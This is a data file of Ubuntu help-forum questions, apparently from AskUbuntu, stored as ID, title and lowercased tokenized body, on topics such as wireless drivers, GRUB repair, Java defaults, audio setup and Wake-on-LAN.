308532	how to install wireless driver for my old laptop hp dv6 1340ej	its connected to the internet and all fine but its very and slow and i 've tried almost everything with some terminal commands and i got some improve but still slow compared to the internet win i login in windows 7 where i have the wireless driver installed i think i need to know my wireless hardware driver for my specific laptop and find the driver for it but ca n't find it anyone can help ? here is my device details : 02:00.0 network controller [ 0280 ] : intel corporation centrino wireless-n 1000 [ 8086:0084 ] command : lspci -nn | grep 0280
308533	can not see usb drive ( even with sudo fdisk -l command )	ubuntu newbie here . i just bought a 3g usb key , and i need to install the software , which is found in the usb key itself . the problem is that ubuntu can not `` see '' it . i found a couple of commands that i used such as sudo fdisk -l or cat proc/partitions â but no success . i unplug the drive , use the command , plug it in , use the command , same result ... help ! also note : i 'm using ubuntu 12.whatever
308534	google app engine gui launcher for ubuntu 13.04	can someone help me to find gae launcher for ubuntu 13.04 . i found it for earlier versions of ubuntu but those ppa 's does n't work for 13.04 . i 'm using python version .
308537	intermittent wireless internet connection in ubuntu 12.04	i recently upgraded from 11.10 ( oneiric ocelot ) to 12.04.2 lts ( precise pangolin ) ( 64 bit version ) and suddenly my wireless internet connection has become intermittent . for example , when i am loading a website , it could require a few refreshes before it actually loads . most of the time web pages and downloads work totally fine but every 10-15 minutes there may be a blip of 5-10 seconds in internet connectivity . i especially notice this when going onto sites with https : // like facebook , google mail and i also noticed it in youtube , where a video now no longer ever loads fully ( very frustrating ! ) . i have tried to google this issue and indeed there are a lot of people with the same issue but the solutions are not very clear and neither is the exact problem . some have said it has something to do with the change to dns resolving with the introduction of resolvconf in 12.04 . also , there are many possible problems and solutions at the following link : https : //bugs.launchpad.net/ubuntu/+source/network-manager/+bug/989900 i have tried to describe the problem as best as possible , however i am a novice and do not know how to diagnose the exact issue and find a solution to it . so in your comments & answers please be as simple and precise as possible . hardware information general laptop : acer aspire s3 processor : intel® core™ i5-3317u cpu @ 1.70ghz × 4 os type : 64-bit sudo lshw -c network description : wireless interface product : ar9462 wireless network adapter vendor : atheros communications inc. physical id : 0 bus info : pci @ 0000:02:00.0 logical name : wlan0 version : 01 serial : 08:3e:8e:07:3f : f1 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list rom ethernet physical wireless -configuration : broadcast=yes driver=ath9k driverversion=3.5.0-34-generic firmware=n/a ip=192.168.2.4 latency=0 link=yes multicast=yes wireless=ieee 802.11abgn resources : irq:19 memory : c0400000-c047ffff memory : afb00000-afb0ffff sudo lspci -nn 02:00.0 network controller [ 0280 ] : atheros communications inc. ar9462 wireless network adapter [ 168c:0034 ] ( rev 01 )
308540	grub2 error : no such partition on boot 13.0.4	-- -update -- - so i discovered something odd . if i select sda4 in reffit , i get an error no partition found error described below . if i use plop boot manager in the dvd drive and select sda4 then i get grub loading properly . so somehow , the mbr that reffit is using is corrupted . it is using a hybrid boot loader so this could be the issue that this has gotten messed up somehow by osx during the resize . anyone know how to recover this ? setup : osx /dev/sda2 ubuntu /dev/sda4 reffit is installed and still working . i can select linux and it was booting to grub and then i would select ubuntu and it would boot . how i caused the problem : resize osx partition in disk utility in osx to free up space for ubuntu . ubuntu is not installed in efi mode as i use custom nvidia drivers . i 've been able to use grub rescue to boot but using boot-repair tool , leaves me back where i started so something must be wrong somewhere that is n't being found by that tool . to boot manually from grub , i use the following commands : set prefix= ( hd0 , gpt4 ) /boot/grub set root= ( hd0 , gpt4 ) insmod ( hd0 , gpt4 ) /boot/grub/i386-pc/linux.mod linux /vmlinuz root=/dev/sda4 ro initrd /initrd.img boot my grub.cfg file is here : http : //pastebin.com/m2juq2aj sudo fdisk -l /dev/sda warning : gpt ( guid partition table ) detected on '/dev/sda ' ! the util fdisk does n't support gpt . use gnu parted . disk /dev/sda : 250.1 gb , 250059350016 bytes 255 heads , 63 sectors/track , 30401 cylinders , total 488397168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00001168 device boot start end blocks id system /dev/sda1 1 409639 204819+ ee gpt /dev/sda2 409640 377176047 188383204 af hfs / hfs+ /dev/sda3 377176048 378445583 634768 ab darwin boot /dev/sda4 * 412082176 488392703 38155264 83 linux sudo gdisk -l /dev/sda gpt fdisk ( gdisk ) version 0.8.5 partition table scan : mbr : hybrid bsd : not present apm : not present gpt : present found valid gpt with hybrid mbr ; using gpt . disk /dev/sda : 488397168 sectors , 232.9 gib logical sector size : 512 bytes disk identifier ( guid ) : 000049bc-4a60-0000-f27f-0000207e0000 partition table holds up to 128 entries first usable sector is 34 , last usable sector is 488397134 partitions will be aligned on 8-sector boundaries total free space is 33636933 sectors ( 16.0 gib ) number start ( sector ) end ( sector ) size code name 1 40 409639 200.0 mib ef00 efi system partition 2 409640 377176047 179.7 gib af00 customer 3 377176048 378445583 619.9 mib ab00 recovery hd 4 412082176 488392703 36.4 gib ef02 5 488392704 488396799 2.0 mib 8200 any help on how to restore my grub appreciated : )
308544	input devices not working at boot	well , i 'm not sure if this is caused by ubuntu , but it started to happen after i installed ubuntu , so i decided to ask here ... sometimes , when i turn my pc it goes to grub and i can not use my keyboard to select an os to boot ( i have ubuntu 13.04 and windows 7 installed here ) , so it goes to the default os , which is windows 7 . once windows starts , i ca n't use my mouse nor my keyboard , not even to turn my pc off ( i have to do it from the power button ) ! after turning my pc off and on again it goes back to normal , but still this happens to me about one out of five times i turn my pc on , any idea of what the cause might be ? thanks .
308545	multiple versions of ubuntu on laptop	i got laptop from friend who tried to install 13.04 and do n't know the status . would never reboot . i installed 11 and then upgraded to 12.04 . when i reboot it wont ' boot but hard reboot brings up screen with 3 options : ubuntu 3.8.0.19 , 3.8.0.19 ( recovery mode ) , previous linux versions . if i select 3.8.0.19 it will stall os come up . hard boot again and if i select 3.8.0.19 ( recovery mode ) then it will partially boot and throw messages but os wo n't come up . i had reboot again and select previous versions then i get further choices 3.2.0-48-generic-pae , 3.2.0-48-generic-pae ( recovery mode ) , 3.2.0-48-generic , 3.2.0-48-generic ( recovery mode ) , 3.2.0-32-generic-pae , 3.2.0-32-generic-pae ( recovery mode ) . i selected 3.2.0-48-generic-pae then i see 12.04lts will come up . i want to just keep 12.04 , without selecting every time from all these versions/options . can you please tell me what to do ?
308547	get text from a website in javascript/qml	i have this website i would like to copy the text from . i do n't know much but it looks like it uses php ( here is the site : http : //feed.evangelizo.org/reader.php ) so i would like to write a fuction that would return the text inside a site . something like this : function example ( ) { var currenttime = new date ( ) ; var month = currenttime.getmonth ( ) + 1 ; var day = currenttime.getdate ( ) ; var year = currenttime.getfullyear ( ) ; if ( day < 10 ) day = '0'+day ; if ( month < 10 ) month = '0'+month ; var httpweb = `` http : //feed.evangelizo.org/reader.php ? date= '' + year + month + day + `` & type=reading & lang=fr & content=gsp '' ; return gettext ( httpweb ) ; } the thing is to write this gettext ( string ) function . how can i do that in javascript/qml ? i have seen something about xmlhttprequest but i do n't understand it . here is an example of text i would like : http : //feed.evangelizo.org/reader.php ? date=20130616 & type=liturgic_t & lang=am & content=gsp thank you if you know the answer . it is the last piece missing to finish my ubuntu touch app .
308559	steam : `` failed to load libsteam.so '' - ubuntu 12.04	after installing steam via ubuntu software center and also after downloading the .deb file from the steam website i get the same error after launching the program . after it connects to the internet and downloading an update it gives me the error `` failed to load libsteam.so '' after searching the internet i see that others have had the same message . yet i can not see a solution . i also have seen that certain libraries are required to run steam . how do i install these ?
308563	how to map a character sequence to a key in xkb ?	i am making a keyboard layout in xkb for punjabi language . the default ones are outdated . in windows i could assign a keyboard key to a sequence of unicode characters . but in xkb i think i can not . but in some arabic layouts it has been done . i want the mapping to be punjabi specific only and do not want to ruin my default english mapping . e.g . i have assigned `` ਾ '' ( sounds like 'aa ' , unicode 0a3e ) to 'w ' and want to assign 'w ' to `` ਾਂ '' ( sounds like 'aan ' , unicode 0a3e+0a02 ) '' , which is composed of two unicode characters `` ਾ '' ( unicode 0a3e ) + `` ਂ '' ( unicode 0a02 ) . can anyone help me , please ?
308564	computer refuses to shutdown once after using wol	i just got wake on lan working but i have a problem : if i wake on lan and try to shutdown or suspend it just starts up again . this only happens once after using wol and then it successfully shuts down and also suspends . what could be causing this ? how should i troubleshoot ? thanks
308570	how to increase pptp and openvpn connection timeout in ubuntu 12.04 ?	i ca n't use pptp and having hard times connecting with openvpn . i 've debugged my vpn connections and saw the problem was always the connection timeout . however i could n't find any options to change that time . is there any ?
308573	burning cd stuck at 100 % creating image checksum	burning data cd using brasero get stuck at 100 % and the dialog box only show creating image checksum , empty progress bar , and a cancel button , and the disk is not spinning anymore in my cd writer . simply click cancel will make the cd blank , i have try with some new an used cd-rw disc but stilk no luck . i 'm on raring .
308574	disable dedicated video card without installing drivers	so , ubuntu does n't come with drivers for my ati radeon hd 5650 ( mobility ) , and i tried about 3 different drivers , and all failed . my question is , can i just disable my ati video card and use the onboard one , without installing the ati drivers ? and how ? ( i heard nvidia cards allow this if you have the software and driver installed )
308577	user is part of a group - except he 's not ?	i 'm really confused about this . i need to give a user read/write access to /var/www and followed the instructions in that question : whats the simplest way to edit and add files to `` /var/www '' ? . all commands were succesful , no error message . however ... [ solarbear @ candyland ~ ] $ cd /var/www [ solarbear @ candyland www ] $ touch hello touch : can not touch `hello ' : permission denied okay so perhaps i did n't add my user properly to the group , no biggie . [ solarbear @ candyland var ] $ sudo adduser solarbear www-data the user `solarbear ' is already a member of `www-data ' . huh ... so i 'm part of the group ... right ? [ solarbear @ candyland var ] $ groups solarbear adm cdrom sudo dip plugdev lpadmin sambashare so i 'm part of the group but it 's not listed under the groups command ? how can that be ? as for /var/www , it seems to belong to the right group : [ solarbear @ candyland var ] $ ls -l /var ... drwxrwxr-x 2 www-data www-data 4096 jun 15 12:11 www so 1 ) why is the www-data group not listed under groups and 2 ) how can i get to write files in /var/www with using sudo ?
308580	ubuntu freezes with presonus fp10 plugged into jack	i want to use my presonus fp10 with jack and ardour in ubuntu 12.04 ( 64 bit ) . here are some outputs : kane @ tripkane : ~ $ ffado-test listdevices can not create thread 1 operation not permitted -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - ffado test and diagnostic utility part of the ffado project -- www.ffado.org version : 2.999.0- ( c ) 2008 , daniel wagner , pieter palmers this program comes with absolutely no warranty . -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - === 1394 port 0 === node id guid vendorid modelid vendor - model 0 0x000a9200c7110007 0x00000a92 0x00010066 presonus - presonus fp10 error : messagebuffer not initialized : 01449050994 : error ( configrom.cpp ) [ 150 ] initialize : could not parse config rom of node 1 on port 0 using : sudo lshw the following result for firewire is presented : *-firewire description : firewire ( ieee 1394 ) product : ieee 1394 host controller vendor : jmicron technology corp. physical id : 0 bus info : pci @ 0000:05:00.0 version : 30 width : 32 bits clock : 33mhz capabilities : pm pciexpress msi ohci bus_master cap_list configuration : driver=firewire_ohci latency=0 resources : irq:19 memory : f6801000-f68017ff memory : f6800000-f68000ff it was recommended to `` enable raw 1394 access '' via ubuntu studio controls which i have done . looking around on ffado , ubuntu forums , and everywhere else on the net when i use the recommended settings that other people employed to get their fp10 's working the following log is output from jack : ( settings : priority 70 , firewire as driver , realtime parameter ) 02:40:09.131 patchbay deactivated . 02:40:09.132 statistics reset . 02:40:09.136 alsa connection change . 02:40:09.146 d-bus : service is available ( org.jackaudio.service aka jackdbus ) . can not connect to server socket err = no such file or directory can not connect to server socket jack server is not running or can not be started 02:40:09.153 alsa connection graph change . 02:40:30.252 d-bus : jack server could not be started . sorry can not connect to server socket err = no such file or directory can not connect to server socket jack server is not running or can not be started sun jun 16 02:40:30 2013 : starting jack server ... sun jun 16 02:40:30 2013 : jack server starting in realtime mode with priority 70 sun jun 16 02:40:30 2013 : [ 1m [ 31merror : can not lock down 82246176 byte memory area ( can not allocate memory ) [ 0m sun jun 16 02:40:30 2013 : [ 1m [ 31merror : firewire err : ffado : error creating virtual device [ 0m sun jun 16 02:40:30 2013 : [ 1m [ 31merror : can not attach audio driver [ 0m sun jun 16 02:40:30 2013 : [ 1m [ 31merror : jackserver : :open ( ) failed with -1 [ 0m sun jun 16 02:40:30 2013 : [ 1m [ 31merror : failed to open server [ 0m sun jun 16 02:40:31 2013 : saving settings to `` /home/kane/.config/jack/conf.xml '' ... 02:40:35.950 could not connect to jack server as client . - overall operation failed . - unable to connect to server . please check the messages window for more info . can not connect to server socket err = no such file or directory can not connect to server socket jack server is not running or can not be started when i start jack with default settings : ( alsa driver ) it works ok . most interestingly when i run qjackctl as super user , the blue light indicating the fp10 works actually switches on , but my system completely freezes and i have to turn the comp off . i 'm not sure what other information might be helpful in helping to solve the issue . thanks in advance , kane edit : i have looked more into other threads/posts , installed ubuntu-studio-recording package and adjusted the rtirq file so that firewire is the highest priority after rtc and used recommended jack settings for the fp10 by other users who have successfully got the device operating : driver = firewire , interface = hw:0 , realtime = unselected . this isntantly gets the blue light to work and appears to run ok apart from message from jack saying : `` can not lock down 82246176 byte memory area ( can not allocate memory ) '' further reading elsewhere requested outputs of the below : /etc/security/limits.d/audio.conf contents are : # provided by the jackd package . # # changes to this file will be preserved . # # if you want to enable/disable realtime permissions , run # # dpkg-reconfigure -p high jackd @ audio - rtprio 95 @ audio - memlock unlimited # @ audio - nice -19 and # /etc/security/limits.conf # # each line describes a limit for a user in the form : # # < domain > < type > < item > < value > # # where : # < domain > can be : # - an user name # - a group name , with @ group syntax # - the wildcard * , for default entry # - the wildcard % , can be also used with % group syntax , # for maxlogin limit # - note : group and wildcard limits are not applied to root . # to apply a limit to the root user , < domain > must be # the literal username root . # # < type > can have the two values : # - `` soft '' for enforcing the soft limits # - `` hard '' for enforcing hard limits # # < item > can be one of the following : # - core - limits the core file size ( kb ) # - data - max data size ( kb ) # - fsize - maximum filesize ( kb ) # - memlock - max locked-in-memory address space ( kb ) # - nofile - max number of open files # - rss - max resident set size ( kb ) # - stack - max stack size ( kb ) # - cpu - max cpu time ( min ) # - nproc - max number of processes # - as - address space limit ( kb ) # - maxlogins - max number of logins for this user # - maxsyslogins - max number of logins on the system # - priority - the priority to run user process with # - locks - max number of file locks the user can hold # - sigpending - max number of pending signals # - msgqueue - max memory used by posix message queues ( bytes ) # - nice - max nice priority allowed to raise to values : [ -20 , 19 ] # - rtprio - max realtime priority # - chroot - change root to directory ( debian-specific ) # # < domain > < type > < item > < value > # # * soft core 0 # root hard core 100000 # * hard rss 10000 # @ student hard nproc 20 # @ faculty soft nproc 20 # @ faculty hard nproc 50 # ftp hard nproc 0 # ftp - chroot /ftp # @ student - maxlogins 4 # end of file lspci | grep -i -e 1394 -e firewire 05:00.0 firewire ( ieee 1394 ) : jmicron technology corp. ieee 1394 host controller ( rev 30 )
308581	how to launch terminal on login	how could i get the terminal to be launched once i have logged in , so that typing commands is much simpler ?
308583	google play music way too fast , accelerated	i turn to google play to listen to my mp3 's most of the time . lately , on my desktop , they are accelerated when i 'm using google play , through chrome . they sound like chipmunks ! if i play the mp3 's on my hard disk through movie player , they play at the correct speed . any idea why this is ?
308584	vpn pptp in lubuntu	can anybody tell me how to make a pptp in lubuntu ? when i try to add vpn connection there is n't any filed there i have to choose pptp
308586	upgrade ubuntu without losing grub dual-boot settings ?	i would like to over-write the partition with my ubuntu , without losing all my dual-boot configurations . my dual boot is ( i think ) configured using grub . can i install a new version of ubuntu without over-writing my grub settings ?
308589	install on to toshiba satellite pro	i applogise in adance for the crudeness of this message i have been handed a toshiba satellite pro c850-1c3 which has had it 's windows 8 accidentally deleted ( hard drive is presumed blank ) . i was hoping to burn the .iso ( following the instructions found on the website ) and install ubuntu , but when i put the disk in and start up i just get no bootable device - restart computer . now i have changed the bios but i still get the same error . help !
308594	a script to shutdown the other pc in the network if they donot respond to ping command	a ( program ) script to shutdown the other linux operated computer in the same network , if they do not respond to ping command otherwise a message to show that they do not respond . please help me
308603	auto complete for often used command line commands ?	for some projects i often type in a couple commands , like for example : cd an/extremely/long/path/in/which/i/have/some/kinda/project and ./runmyproject -- with some -- command line -- options set seeing that i 'm pretty lazy i try to avoid typing those commands in full again and again . so i can of course use the up-key a lot to find back those commands , but often , i also have so many commands in between , that searching for it takes even more time than just typing it . i now wonder if there is some kind of utility that can suggest a full command which i use a lot , when i have n't typed all of it yet . so that i can for example type 'cd an/ ' and that it already suggests the rest of the path because i 've used it so much the past month . i did find something called bash smart complete . but that is a little `` dumb '' in that it does n't look at the commands i used before . i just also found this so answer , which suggests putting the commands i use a lot in a file . that however , is not responsive enough in that i would need to create a new file for it every time i start new projects or change folders or program arguments . does anybody know any other utility or other way to achieve this ? or , would anybody know how i could alter the bash smart complete so that it can look at the commands i used in say the past month and complete the command which fits and has been used the most in the past month ? [ edit ] below are some really great answers . i haven marked any as a definite answer yet . not because i do not like the answers , i do , but because none of them is an absolute winner . i think the finalterm is a great project . unfortunately it is still rather rough around the edges . for example ; it does n't support copy-paste yet . i would keep on eye on that project though , because when it will mature i think it 'll be a great terminal app . as for the other answers ; they either suggested creating an alias , which is not what i want to do because it creates extra work instead of taking work away , or using ctrl+r , which is a brilliant ( i did n't know about it ! ) . a couple of people suggested using ctrl+r , so i ca n't really highlight one answer over the other . so for now i am definitely using ctrl+r , and in the future i might use finalterm . thanks for all the great answers guys !
308610	re-installing newer ubuntu- does `` erase ubuntu ... ... . and reinstall '' delete grub ?	i have windows 7 and ubuntu 12.04 with grub providing dual boot . i would like to upgrade the ubuntu via a re-installation and keep my grub so i can dual boot . i am at the point in the installation process where i am presented with the screen : '' this computer currently has windows 7 and ubuntu 12.04.2 lts '' ... .. am i ok selecting `` erase ubuntu 12.04.2 lts and reinstall '' ? my grub will not get deleted ?
308611	renaming artist in rhythmbox	i have just purchased the new quotsa cd but rhythmbox did n't recognise it and placed it in the unknown artist folder . when i try and change the artist info , i get the following error : any ideas how i can overcome this ? update i have just checked the permissions of my music folder which i have placed in a subdirectory of dropbox keeping my 3000+songs safely backed up . and the group simon ( that 's me folks ) had no permissions set , but was allowed to set them so gave my group full privileges . - it made no difference ! ubuntu 13.04 / rhytmbox 2.98 / right click > properties > artist . i 'm taking action on files ripped to the hard disk as .m4a files . the files are stored in a folder im my music library called queens of the stoneage > like clockwork > trackname.m4a file info complete name : /home/simon/dropbox/music/queens of the stone age/like clockwork/01 - keep your eyes peeled.m4a format : mpeg-4 format profile : base media / version 2 codec id : mp42 file size : 4.74 mib duration : 5mn 4s overall bit rate mode : variable overall bit rate : 131 kbps album : like clockwork part/position : 1 track name : keep your eyes peeled track name/position : 1 track name/total : 10 performer : unknown genre : rock recorded date : 2013-1-1 encoded date : utc 2013-06-15 18:27:07 tagged date : utc 2013-06-15 18:27:07 writing application : rhythmbox audio id : 1 format : aac format/info : advanced audio codec format profile : lc codec id : 40 duration : 5mn 4s bit rate mode : variable bit rate : 128 kbps maximum bit rate : 289 kbps channel ( s ) : 2 channels channel positions : front : l r sampling rate : 44.1 khz compression mode : lossy stream size : 4.64 mib ( 98 % ) language : english encoded date : utc 2013-06-15 18:27:07 tagged date : utc 2013-06-15 18:27:07
308626	how can i keep track of changes to files by specific programs ?	in ubuntu , is it possible to keep track of all programs that are used to modify one file ? for example , if i had a file called sampletext.txt , would it be possible to generate a list of every edit that had been made to that file , along with each program that had edited it ?
308629	how to recover files from failed upgrade ?	i tried to upgrade from 12.04 to 12.10 and am encountering a problem with graphics drivers . my plan is to re-install 12.04 . before i do that , i would like to copy some files from the machine . i 'm able to boot successfully from a disk with 12.04 , but i ca n't find my old home directory , as the only user in the home directory is ubuntu . i 've also tried to ssh into the machine , when it had booted ( without graphics ) but was unable to . is there a way to get to the old filesystem directory while booting from a cd ? any other suggestions ?
308632	how to change color of top bar in gnome 3.8	i have updated to ubuntu 13.04 and install gnome 3.8 . i have some questions how to customize it . it now looks like this : what confusing me : i ca n't find how to change color of top bar , i found how to change theme for windows , but it did n't affect on top bar . some app have app bar both on top and bottom bar ( on screenshot - its firefox ) . i want top bar have no app bar . it seems for me that after gnome 2 in 3.8 there is less usefull space for window , i dodn`t know what exactly wrong , but may be in previous version there were not so many bars ?
308634	how do i launch a web browser on my local machine that visits websites through the ip of a remote machine ?	so , i want to visit a website that only permits access to computers from certain ip domains . my ip is not from one of the allowed domains , but i 've ssh 'd into a ( linux ) machine at another location that is at one of the allowed domains . how do i launch a web browser on my local machine that visits websites through the ip of the remote machine ?
308635	how do i automatically rename the byobu window	is there a way to automatically name my byobu windows . i think about an entry in my .bashrc or something similar that sets my tab name to $ user @ $ host .
308638	bluetooth tethering breaks dns routing	every time i use bluetooth to tether ( via dun ) to my samsung phone the dns information is forced into other connections ( wifi/ethernet ) . turning off the connection ( and bluetooth ) does n't seem to fix it . if i use the connection manager and try to set my wifi connection to automatic it always pulls in the old phone dns addresses . i can set the dns manually which works when there 's no proxy ( only because i do n't know the ip of the proxy to set the dns to manually ) . i ca n't figure out a way to auto configure dns , the connection always ends up with the phone 's dns settings . by the way , i had the same problem with a gsm usb dongle . the only way i could fix it was to uninstall the gsm driver . however with bluetooth tethering nothing shows up in the connection manager . the ip will auto-configure , but the dns never will . any thoughts ? ( i 've tried service networking restart , service network-manager restart , dhclient ( -r and again without ) ) rebooting , etc . edit : using linux ubuntu 3.2.0-48-generic # 74-ubuntu smp thu jun 6 19:45:16 utc 2013 i686 i686 i386 gnu/linux
308639	nautilus 3.8 can not store sftp passwords	since iv'e upgraded to 13.04 gnome shell , nautilus can no more store sftp passwords . it does not work with my existing bookmarks and with the new ones created .
308642	how do i install three desktops ?	in lubuntu i could add desktops . i do n't see that in ubuntu . i am using the default installed ubuntu . thank you ; sherman
308643	can i install ubuntu on my laptop ( dell inspiron 14z-5423 )	i have tried to install ubuntu 12.04 on my laptop , which is a dell inspiron 14z ultrabook , model number 5423.whlile booting with a pen drive , i selected the `` try ubuntu '' option .i then created the necessary partitions using gparted.then hwen i tried to install ubuntu the install manager could'nt find the partitions created by me nor any other partition which was actually present .
308645	debug wol failing to configure on ubuntu server 12.04	i have a pc running ubuntu server 12.04 . i 'm having trouble getting this to wake on lan ( wol ) . i 'm now pretty certain i 've narrowed this down to an issue with ubuntu or the way it 's configured . the reason i say this is that if i boot the box from an ubuntu desktop 12.04 install disk , go into `` try now '' and then shut down the machine will wake on lan . according to this link : https : //help.ubuntu.com/community/wakeonlan - the command sudo ethtool eth0 should show wake-on : g if the card is set up to wake on lan and only require ethtool -s eth0 wol g if this shows the d flag . it does not show the d flag and does show the same on both the ubuntu desktop install disk and the server . i have however tried both with and without this command being fired on the server when the network comes up and neither works . i dont really know how to go about debugging this and figuring out why it 's not working . i dont see anything in the syslog which looks useful ( but i would n't know what to look for ) and the only point at which it becomes evident that wol is not working is when the machine is switched off ! how can i go about debugging why ubuntu server 12.04 is not correctly enabling wol ? what else can i look for that is different between the desktop install disk and my installed server ?
308646	how to make bash scripts execute when clicked upon ?	i am trying to create a bash script for the dash home button , as i am trying to fully replace the unity dock with the cairo dock . unfortunately , i have been unable to make it so that the script only runs when i click on it . how can i make a bash script execute when clicked upon ? if it helps , here is my code : # \bin\bash xdotool key super
308652	how to fix the cairo dock ?	i have been trying to replace unity with cairo dock , and i am almost there ! the only question i have is how can i turn off the cairo dock auto hide , so as to fix it in place no matter what ?
308654	headphones not working in ubuntu 13.04	i just installed ubuntu 13.04 and getting sound through laptop speakers but not through headphones . laptop : asus k55vm-sx086d headphones : jbl
308656	setting up django and posgtresql on ubuntu	i am running kubuntu 12.04 lts . i have been reading the django book and i have hit a snag where i 'm unable to set up posgresql to work with the django app . i have installed both python-postgresql and python-psycopg via synaptic . when i run : import conncetion from django.db i get the following error : traceback ( most recent call last ) : file `` < stdin > '' , line 1 , in < module > file `` /usr/local/lib/python2.7/dist-packages/django/db/__init__.py '' , line 11 , in < module > if settings.databases and default_db_alias not in settings.databases : file `` /usr/local/lib/python2.7/dist-packages/django/conf/__init__.py '' , line 53 , in __getattr__ self._setup ( name ) file `` /usr/local/lib/python2.7/dist-packages/django/conf/__init__.py '' , line 46 , in _setup % ( desc , environment_variable ) ) django.core.exceptions.improperlyconfigured : requested setting databases , but settings are not configured . you must either define the envirogs.configure ( ) before accessing settings . help me understand how django and postgreql communicate or direct me to a django tutorial suited for beginners or a post that helps one set up django and posgre on ubuntu .
308657	installing boost on 12.04- have ran `` sudo apt-get install libboost-all-dev '' - now what ?	i want to install the boost libraries on ubuntu 12.04 so i ran : sudo apt-get install libboost-all-dev but now searching for a folder named `` boost '' i can not seem to find where the files have been installed ? do i have to run some sort of bjam command now or something ? i am expecting to see some sort of boost folder hierarchy and then all the header and source files for the boost libraries ?
308659	shutdown command history in terminal	the default terminal in ubuntu ( 13.04 ) preserves previous commands in an iterable list , even from session to session . same with byobu terminal . but for some reason sudo shutdown ... . is never preserved in this list . why is that ? how can i change it so that the shutdown command is also saved , so i do n't have type it each time ? ( i prefer using the terminal to the gui . )
308661	use of relative path to a local file for bookmarks in firefox	for ubuntu 12.04 using firefox 21.0 , say i have a local .html file , test.html , in my home directory , which i want to add to the bookmarks menu.. first i use `` open file '' and then choose the file from file selection dialog , then i press ctrl+d to save the bookmark then i move to the bookmarks side bar , and right click on the bookmark , and choose `` properties '' from the dialog i can see that the location of the file is `` file : ///home/fcihh/test.html '' where `` /home/fcihh/ '' is my home directory . the problem is that it uses an absolute path to the home directory . my case , is that i have two machines that share the same bookmarks , but the absolute path to the home directory is different for each machine . therefore , i would like to use a relative path to the file such that the bookmark can be used on either machine.. i have tried replacing `` /home/fcihh '' with a tilde `` ~ '' but that does not work.. ( the tilde seems to be removed automatically when i save the change.. )
308663	how to set the default java version	i have been using java 6 on ubuntu 11.10 , but now i want to update to version 7 . i 've installed version 7 via ppa as described here . if i run sudo update-alternatives -- config java i get the following output : there are 2 choices for the alternative java ( providing /usr/bin/java ) . selection path priority status -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- 0 /usr/lib/jvm/java-7-oracle/jre/bin/java 64 auto mode 1 /usr/lib/jvm/java-6-sun/jre/bin/java 63 manual mode * 2 /usr/lib/jvm/java-7-oracle/jre/bin/java 64 manual mode similarly , if i run : sudo update-alternatives -- config javac i get the output : selection path priority status -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- 0 /usr/lib/jvm/java-7-oracle/bin/javac 64 auto mode 1 /usr/lib/jvm/java-6-sun/bin/javac 63 manual mode * 2 /usr/lib/jvm/java-7-oracle/bin/javac 64 manual mode so it looks like version 7 is already the default . but if i run either java -version or javac -version the output indicates that version 6 is still the default . how can i set the default to version 7 ?
308666	how to play h264 encoded videos with totem ?	i can play some mkv videos but some others ca n't play . why ? i do n't want to install ubuntu-restricted-extras cause it brings adobe flash that has not been supported again and it is the old version . and it is not easy to uninstall .
308667	how do i create partitions from unused disk space ?	i am attempting to create a 4gb partition on my ubuntu boot partition . under gparted it says i have 26.19gb of unused space , how do i create a 4gb partition from this ? the resize option is greyed out , and i 'm worried if i unmount it that i wo n't have an os .
308671	run win 16-bit application in wine	xubuntu 12.04 . hp compaq nc8430 . 2 gb ram . wine 1.4 . i 'm trying to run castle of the winds , an old 16-bit windows application , in wine . i 've put the application in .wine/drive_c . i 've added it as an application in wine , and i 've tried setting the windows version to 3.1 , and i 've also tried win xp . each time i try to run the app , xubuntu freezes . i can do a ctl-alt-f4 , and then a ctl-alt-del to reboot . this application is not a dos application , so i do n't think dosbox will help . any ideas ?
308672	google chrome launcher not installed on unity bar	i installed ubuntu 12.04 today . i expected the google chrome browser to be part of the install . when i did n't see the icon i went to the ubuntu software web page and downloaded and installed the browser . i was informed that it had installed successfully . still no icon . i use g.mail so the chrome browser is important to me .
308685	how can i keep a full-screen chrome flash player when chrome loses focus ? 13.04	when i use a flash video that has a full-screen function , i would like to be able to allow another program to get focus and have the flash video stay full-screen . i 'm using chrome 27.0.1453.110 with adobe 's implementation of flash 11.2 . i 'm using 11.2 because the primary purpose of using flash is amazon 's instant video . currently , whenever another program gains focus , the flash full-screen restores back to what it was before . is there any way to change this behavior ?
308688	where can i download the default wallpaper of ubuntu 13.04 ?	where can i download the default wallpaper of ubuntu 13.04 from an official source ? i can download all the other wallpapers that come along with it by either going to launchpad or installing the package `` ubuntu-wallpapers-raring '' . but the default one seems to impossible to get a hold of ( from the official ubuntu website ( s ) ) .
308695	help with hauppauge wintv-hvr-2250 on ubuntu 13.04	i 've been following the instructions on this website : http : //www.linuxtv.org/wiki/index.php/hauppauge_wintv-hvr-2200 i 'm by no means an expert and i 'm stuck on the section titled `` making it work '' . where it says : to get the card working you 'll have to apply the this patch download v4l-saa7164-1.0.2-3.fw and copy it to /lib/modules i have no clue how to apply the patch and i 'm looking for some help . thank you .
308696	replacing windows vista with ubuntu desktop 12.04.02	i 'm a ubuntu `` newbie '' , and am just starting to learn linux ( thanks to eli the computer guy ) . i am an ibm system i administrator ; but have extensive pc experience in the windows world ; but , very little linux knowledge at this point . i have an emachines model et6141-d2w desktop that had windows vista ( 2.00 ghz processor , 2gb ram , 288gb hd . the boot sector became corrupted ; so , it no longer boots into windows ; but , i can place it into a sata docking station , and still access all the data ; i.e. , my pics , docs , etc. , which i have backed up to dvds . i want to install ubuntu 12.04.02 desktop on it ; but when i try to boot from the dvd i burned from the ubuntu-12.04.02-desktop-i386.iso , it just keeps recycling ; i.e. , goes through the motions , but never boots from the dvd , even though i changed the boot order to boot from dvd drive first . what am i doing wrong ? i just downloaded infrarecorder , and am downloading the iso again , and will use infrarecorder to burn to dvd . i 'm thinking the iso did n't burn properly when i first tried using windows vista burn program . on another note : the ubuntu-12.04.02-desktop-i386.iso says it 's 693mb ; but when i tried to burn it to a cd-rw 700mb disk , it said it required 727mb available . 